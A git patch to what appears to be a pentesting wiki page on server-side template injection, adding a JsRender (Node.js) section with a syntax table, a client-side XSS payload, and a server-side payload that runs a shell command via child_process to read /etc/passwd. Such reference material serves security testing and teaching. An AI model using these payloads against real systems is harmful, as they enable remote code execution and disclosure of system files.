From 77cd9471fb37695fe9328eb65080a207571a4649 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 1 Dec 2020 16:50:24 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 .../ssti-server-side-template-injection.md    | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
index 8713075cd..97b6a4d7f 100644
--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -220,6 +220,33 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
 
 * [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
 
+### JsRender \(NodeJS\)
+
+| **Template** | **Description** |
+| :--- | :--- |
+| {{: …}} | Evaluate and render output |
+| {{&gt; …}} | Evaluate and render HTML encoded output |
+| {{!– … –}} | Comment |
+| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) |
+
+* {{:7\*7}} = 49
+
+#### Client Side
+
+```text
+{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
+```
+
+#### Server Side
+
+```bash
+{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
+```
+
+#### More information
+
+* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
+
 ### ERB \(Ruby\)
 
 * `{{7*7}} = {{7*7}}`